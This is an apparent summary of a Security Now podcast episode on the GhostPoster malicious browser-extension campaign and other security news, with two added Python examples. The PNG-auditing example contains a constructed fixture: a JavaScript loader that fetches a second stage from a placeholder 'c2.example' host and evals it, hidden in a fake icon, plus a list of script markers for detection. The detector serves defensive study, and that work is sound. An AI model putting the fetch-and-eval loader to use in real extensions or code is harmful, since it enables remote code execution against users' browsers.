Security Now 1061: More GhostPosting
Hosts: Steve Gibson, Leo Laporte
Date: January 21, 2026
Episode Overview
This week, Steve Gibson and Leo Laporte discuss the resurgence and expansion of the “Ghost Poster” malicious browser extension campaign, delve into critical tech news impacting security and privacy, and answer listener questions. The episode is an engaging blend of cybersecurity insights, industry happenings, and the usual mix of humor and historical perspective. Key topics include rising RAM prices, funding for Python security, automotive data privacy, new U.S. infrastructure security strategies, bold German surveillance legislation, Let's Encrypt certificate changes, Iran’s internet disconnect, and the practical risks of browser extensions and cloud setup errors.
Main Discussion Points & Insights
1. GhostPoster Malware Returns—and Grows
[140:10]
- Recap: Four weeks ago (Ep. 1057), Steve described how 17 Firefox add-ons (“Ghost Poster” campaign) used PNG icons with steganographically hidden JavaScript to infect over 50,000 users.
- Update: New research by LayerX uncovered 17 additional malicious extensions, this time on Edge and Chrome, with over 840,000 downloads since 2020.
- Malware Mechanics:
- Stealth Payload: PNG image files shipped inside the extension package conceal the malicious code. Nothing runs until a dormancy period of 48 hours (in some cases five days) has passed, so that store review and short sandbox analysis see only benign behaviour.
- Multi-Stage Attack: Once activated, the extension connects to a command and control server, downloads further payloads, manipulates HTTP headers, and injects additional scripts for click fraud, affiliate hijacking, or further intrusions.
- Platforms Affected: Firefox, Edge, and Chrome. Only two malicious payloads targeting Chrome are known so far, which Steve found odd.
- Most Popular Lures: Translation tools (e.g., “Translate Selected Text with Right Click” had ~522,000 downloads), fake VPNs, Instagram downloaders, screenshot tools.
- Persistence: Pulling an extension from a store does not uninstall it from browsers that already have it; it stays installed and active until the user removes it.
- Takeaway:
“Keep the things you need and that come from real, known, legitimate enterprises... Don’t install extensions just because you have room on your toolbar.” — Steve Gibson [157:21]
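The static checks a practitioner would run over an unpacked extension, as an added example that is not GhostPoster's code, the researchers' tooling, or anything from the episode: it walks the PNG chunk structure and flags the places a payload can hide without breaking the image (bytes after IEND, chunk types the spec does not define, oversized or script-looking text chunks, and CRC mismatches that betray a chunk rewritten after encoding). Because it inspects files on disk, the malware's dormancy timer never comes into play. The JS-marker heuristic, the 1 KiB text limit, the `c2.example` host and the loader text are all constructed for illustration.

```python
"""Static audit of the PNG files in an unpacked browser extension.

Constructed example (not GhostPoster's code or any vendor's detection logic).
A PNG decoder ignores bytes after IEND, skips chunk types it does not know
and never looks inside text chunks, so all three are convenient hiding places.
"""
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# Chunk types defined by the PNG spec plus the common APNG/eXIf extensions.
STANDARD_CHUNKS = {
    "IHDR", "PLTE", "IDAT", "IEND", "tRNS", "cHRM", "gAMA", "iCCP", "sBIT",
    "sRGB", "tEXt", "zTXt", "iTXt", "bKGD", "hIST", "pHYs", "sPLT", "tIME",
    "eXIf", "acTL", "fcTL", "fdAT",
}
# Assumed heuristic: tokens rare in image metadata but common in a JS loader.
JS_MARKERS = (b"eval(", b"function", b"fetch(", b"XMLHttpRequest",
              b"chrome.", b"browser.", b"document.", b"atob(")
TEXT_CHUNK_LIMIT = 1024  # assumed: an icon has no business carrying more metadata

def parse_png_chunks(data):
    """Walk the chunk stream; return ([(type, payload, crc_ok), ...], trailing_bytes)."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos, chunks = len(PNG_SIGNATURE), []
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        start, end = pos + 8, pos + 8 + length
        if end + 4 > len(data):                 # truncated chunk: keep what is there
            chunks.append((ctype.decode("latin-1"), data[start:], False))
            return chunks, b""
        payload = data[start:end]
        (crc,) = struct.unpack(">I", data[end:end + 4])
        crc_ok = (zlib.crc32(ctype + payload) & 0xFFFFFFFF) == crc
        chunks.append((ctype.decode("latin-1"), payload, crc_ok))
        pos = end + 4
        if ctype == b"IEND":                    # decoders stop here; the rest is free space
            return chunks, data[pos:]
    return chunks, b""

def looks_like_script(blob):
    """Heuristic: at least two JS markers within the first 64 KiB."""
    sample = blob[:65536]
    return sum(1 for marker in JS_MARKERS if marker in sample) >= 2

def text_of(ctype, payload):
    """Readable part of a text chunk; zTXt is keyword, NUL, method byte, deflate data."""
    if ctype == "zTXt":
        try:
            return zlib.decompress(payload.split(b"\x00", 1)[1][1:])
        except (IndexError, zlib.error):
            return payload
    return payload

def audit_png(data):
    """Return a list of (where, why) findings; an empty list means nothing odd."""
    findings = []
    chunks, trailing = parse_png_chunks(data)
    for ctype, payload, crc_ok in chunks:
        if not crc_ok:
            findings.append((ctype, "CRC mismatch: chunk rewritten after encoding"))
        if ctype not in STANDARD_CHUNKS:
            findings.append((ctype, f"non-standard chunk type, {len(payload)} bytes"))
        if ctype in ("tEXt", "zTXt", "iTXt"):
            payload = text_of(ctype, payload)
            if len(payload) > TEXT_CHUNK_LIMIT:
                findings.append((ctype, f"oversized text chunk, {len(payload)} bytes"))
        if looks_like_script(payload):
            findings.append((ctype, "payload looks like JavaScript"))
    if trailing:
        findings.append(("after IEND", f"{len(trailing)} trailing bytes"))
        if looks_like_script(trailing):
            findings.append(("after IEND", "trailing data looks like JavaScript"))
    return findings

# --- constructed sample input; these are not real extension icons -----------
def _chunk(ctype, payload):
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)

def build_png(extra_chunks=(), trailing=b""):
    """Valid 1x1 RGBA PNG with optional extra chunks before IEND and bytes after it."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 6, 0, 0, 0)    # 1x1, 8-bit RGBA
    idat = zlib.compress(b"\x00" + bytes([0, 0, 0, 255]))   # filter 0 + one pixel
    body = _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat)
    for ctype, payload in extra_chunks:
        body += _chunk(ctype, payload)
    return PNG_SIGNATURE + body + _chunk(b"IEND", b"") + trailing

# Made-up loader text showing the fetch-then-eval pattern; the host is a placeholder.
FAKE_LOADER = (b"(function(){fetch('https://c2.example/stage2')"
               b".then(function(r){return r.text()})"
               b".then(function(s){eval(s)})})();")
BENIGN_ICON = build_png(extra_chunks=[(b"tEXt", b"Software\x00constructed sample")])
SUSPECT_ICON = build_png(extra_chunks=[(b"stEg", FAKE_LOADER)], trailing=FAKE_LOADER)
```

`audit_png(BENIGN_ICON)` returns an empty list; `audit_png(SUSPECT_ICON)` returns four findings: the unknown `stEg` chunk, its script-looking payload, the bytes after IEND, and the script-looking trailing data. Feed it the icons from an unpacked extension (Chrome keeps extensions unpacked under the profile's Extensions directory; a Firefox XPI is a zip archive and needs extracting first). The caveat: this catches payloads stashed in the container, not data hidden in the pixel values themselves, so a clean result is not proof of a clean icon.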
2. RAM Price Increases Impact Security and Infrastructure
[02:29]
- Scope: Not just PCs, but high-end enterprise firewalls and networking equipment will be hit.
- DRAM prices: Up 60–70% YoY, expected to rise an additional 50% this quarter.
- Why: AI companies buying all available DRAM for datacenters. Consumer/server RAM supply shrinking.
- Consequence:
- Firewall companies like Fortinet, Palo Alto Networks, and Check Point will face higher costs, lower margins, and likely pass these costs on.
- Steve’s tip: If you’re planning a network hardware purchase, buy now.
3. Anthropic’s $1.5M Donation to Python Software Foundation
[23:26]
- Purpose: To bolster open-source Python security, especially for the package repository PyPI.
- Features Funded: Automated proactive code review (leveraging AI, likely Anthropic’s own Claude), curated malware datasets, and enhanced developer support.
- Broader Impact: Secure supply chains for Python and all open source communities (tools to be reusable).
- Steve’s perspective: Smart move—AI vendors' ecosystems all rely on Python; hopefully, more companies step up.
4. FTC vs. General Motors: Selling Driver Data
[34:09]
- Findings: GM, via OnStar, sold precise geolocation and driving data to third parties without real consumer consent.
- FTC Order: Five-year ban on GM sharing such data with credit agencies; must offer transparency, allow data deletion, and provide opt-outs.
- Other automakers facing similar allegations: Hyundai, Toyota, and Honda.
- Steve’s Commentary:
“GM knows that if their users were clearly asked whether they would like to have detailed data about their driving habits sold for GM’s profit...no one would say yes.” [39:24]
5. U.S. Critical Infrastructure: From CIPAC to ANCHOR
[48:45]
- Background: The Critical Infrastructure Partnership Advisory Council (CIPAC) enabled open (but protected) incident sharing between industry and government.
- Trump administration shut it down; now replacing it with ANCHOR (Alliance of National Councils for Homeland Operational Resilience).
- Key Details:
- Reduces bureaucracy (no endless new charters needed).
- Liability protections—a key for honest reporting—are still being worked out.
- Industry is eager for it; success will depend on legal shields.
6. Germany’s Surveillance Law: Expanding the BND
[59:19]
- BND (Bundesnachrichtendienst, Germany’s NSA equivalent) to gain authority to:
- Intercept all internet communications (not just metadata).
- Store data for six months.
- Hack foreign ISPs (including U.S. companies like Google, Meta) if uncooperative.
- Plant “federal trojans” on devices (even by entering apartments!).
- Steve’s reaction:
“Thank goodness for state-of-the-art encryption... The math is your friend.” [63:34]
He notes, though, that encrypted traffic captured and stored today could eventually be decrypted if large quantum computers arrive, a risk he regards as possible rather than certain.
7. Iran Plans Permanent Internet Disconnection
[83:41]
- Since January 8, 2026, Iran's connection to the global internet has been cut.
- The government is also moving to block external messaging apps, satellite internet, and Starlink.
- A majority of Iran's population is under 34; Steve predicts the blackout is unsustainable in the long run.
8. Let’s Encrypt “Six-Day Certificates” Are Live
[79:06]
- Short-lived certificates (160 hours, roughly six days) and certificates for IP addresses are now generally available.
- Goal: shrink the window of exposure if a private key is compromised or a certificate is mis-issued; a certificate that expires within days barely depends on revocation at all.
- Steve’s view:
- Good as an option, but moving toward forced short terms feels “regressive” and unnecessary given improved revocation mechanisms.
- If you automate renewal, it’s a non-issue.
“It’s the being forced to use shorter life certificates for the web or for code signing that feels so wrong and regressive to me. I don’t need a nanny.” —Steve [81:51]
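A check on the "just automate it" advice, as an added example that is not Let's Encrypt or certbot code: with a 160-hour certificate the question is not whether renewal is automated but whether the scheduler runs often enough to absorb a failed attempt before expiry. The renewal policy it assumes (attempt at two-thirds of the lifetime, one retry at the next scheduled run) is the common ACME-client default and is stated here as an assumption; the cadences tried are illustrative.

```python
"""Renewal-cadence check for short-lived TLS certificates.

Added example, not Let's Encrypt or certbot code. Assumed policy: an ACME
client attempts renewal once two-thirds of the lifetime has elapsed and a
failed attempt is retried at the next scheduled run. All times are in hours.
"""

SIX_DAY_CERT_HOURS = 160          # Let's Encrypt short-lived profile: 6 days + 16 h
NINETY_DAY_CERT_HOURS = 90 * 24   # the classic 90-day profile

def renewal_plan(lifetime_hours, run_interval_hours, retries_allowed=1):
    """Worst-case timeline for a cron job or timer that runs every run_interval_hours.

    The job only notices the certificate is due at its first run after the
    two-thirds mark, and each failed attempt costs one more full interval.
    """
    renew_at = lifetime_hours * 2 / 3
    latest_success = renew_at + run_interval_hours * (retries_allowed + 1)
    return {
        "renew_at_h": renew_at,
        "latest_success_h": latest_success,
        "slack_h": lifetime_hours - latest_success,
        "safe": latest_success < lifetime_hours,
    }

def max_run_interval(lifetime_hours, retries_allowed=1):
    """Largest scheduler cadence that still renews before expiry under this policy."""
    return (lifetime_hours - lifetime_hours * 2 / 3) / (retries_allowed + 1)

def cadence_table(lifetime_hours, intervals=(7 * 24, 24, 12, 6)):
    """One (interval, safe, slack) row per cadence, for a quick look at a profile."""
    return [(i, renewal_plan(lifetime_hours, i)["safe"],
             round(renewal_plan(lifetime_hours, i)["slack_h"], 1)) for i in intervals]

if __name__ == "__main__":
    for label, life in (("90-day", NINETY_DAY_CERT_HOURS), ("six-day", SIX_DAY_CERT_HOURS)):
        for interval, safe, slack in cadence_table(life):
            print(f"{label:7} cert, job every {interval:3}h: {'ok  ' if safe else 'MISS'} slack {slack}h")
        print(f"{label:7} cert: widest safe cadence with one retry {max_run_interval(life):.1f}h")
```

For the six-day profile a weekly job misses outright, a daily job succeeds with about five hours of slack and only if no more than one attempt fails, and a 12-hour or 6-hour timer leaves a comfortable margin; the same weekly job on a 90-day certificate has more than two weeks to spare. That is the practical difference the shorter lifetime makes once renewal is automated.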
9. Listener Feedback Segment Highlights
- SpinRite saves SSD: Listener Don Edwards from South Africa shares before-and-after SSD benchmark charts showing SpinRite dramatically restored performance.
- MongoDB open to the internet: Cloud and installer defaults favour ease of use and leave a database reachable from the public internet unless the operator explicitly restricts access; convenience is not the same as security.
- Home user hacking story: once listener Bob clicked the wrong thing, a ScreenConnect remote-access client installed with no further interaction and handed the attackers his machine, along with every account it was persistently logged in to. Lessons: persistent logins, no step-up (e.g. biometric) authentication for sensitive actions, and a single bad click add up.
“With that convenience...comes the consequence that anyone and anything that’s able to use our persistently logged-in computer can act on our behalf.” — Steve [105:43]
10. Claude, AI, and Vibe Coding: User Success Stories & Cautions
[120:34]
- Listener Rob, a non-programmer, uses Claude together with Copilot in VS Code to turn product briefs into working alpha software, weeks before human developers would have delivered it.
- Tips for new users:
- Understand token/context limits—start a new chat/project when they’re reached.
- Use documentation and summarization for state transfer.
- Double-check Claude’s work (it will “lie” or hallucinate).
- Leo’s advice: Explore plugins, best practices, and “skills” for Claude.
- Steve’s observation:
“It all feels like first steps… but it feels like it’s going to change the world.” [133:54]
Notable Quotes & Moments
“There’s probably some diagnosis. I’m sure. We’re all on the spectrum somewhere.”
– Leo Laporte re: ADHD and geek curiosity [01:40]
“The phrase free VPN is an oxymoron.”
– Steve Gibson [141:29]
“If you’re going to trust something that has crypto in it, it has to be open source crypto…”
– Leo on Bitwarden [08:39]
“Turn none of mine off... It’s just 24/7.”
– Steve on never shutting down servers [114:28]
“You just have to remember—you can’t know what you don’t know. There’s no point in getting overly worked up… Worry about what you can control: don’t install stuff you don’t need.”
– Steve [156:56]
Timestamps for Important Segments
- GhostPoster Recap & Expansion: 140:10 – 157:21
- RAM Prices & Enterprise Hardware Impact: 2:29 – 8:29
- Python Foundation/Anthropic Funding: 23:26 – 29:46
- GM Driver Data Sale & FTC Action: 34:09 – 41:09
- CIPAC to ANCHOR, US Infrastructure: 48:45 – 59:17
- German Surveillance Legislation: 59:19 – 67:16
- Let’s Encrypt 6-Day Certs: 79:06 – 83:41
- Iran’s Internet Shutdown: 83:41 – 84:40
- Listener SSD Repair Story: 85:39 – 91:00
- Browser Extension Security Advice: 155:09 – 158:08
- Claude AI/Vibe Coding Experiences: 120:34 – 135:38
Security & Privacy Tips from This Episode
- Extensions: Only install those you absolutely need from trusted sources. Remove old/unneeded extensions regularly.
- Cloud Services: Bind databases and management interfaces to private networks by default; never assume a cloud instance is locked down out of the box.
- Persistent Logins: For services like PayPal, log out when you can, and turn on biometric or two-factor re-authentication for sensitive actions where the service offers it.
- Certificates: Automate renewal regardless of lifetime; six-day certs are an option most sites do not need unless they protect high-risk assets.
- Personal Data: Take proactive steps (e.g., DeleteMe) to reduce your digital footprint; be wary of data brokers.
Episode Tone / Style
The style remains as always: friendly, accessible, fun, anecdotal yet highly technical, with a healthy dose of skepticism and nostalgia. Leo and Steve riff on everything from 90s video stores and old-school hardware buying strategies to the wild west of current AI development.
Final Thoughts
Security Now #1061 is essential listening for practitioners, developers, and any tech-aware user. It’s a reminder that threat actors, vulnerabilities, and technology are evolving—so too must your skepticism and security hygiene. Above all, the episode’s main lesson: install less, question more—whether browser add-ons or that innocuous cloud “one-click” feature.
Next up: The last episode of January, where Steve and Leo promise to keep their eye on fast-moving threats, confused legislation, and all things security.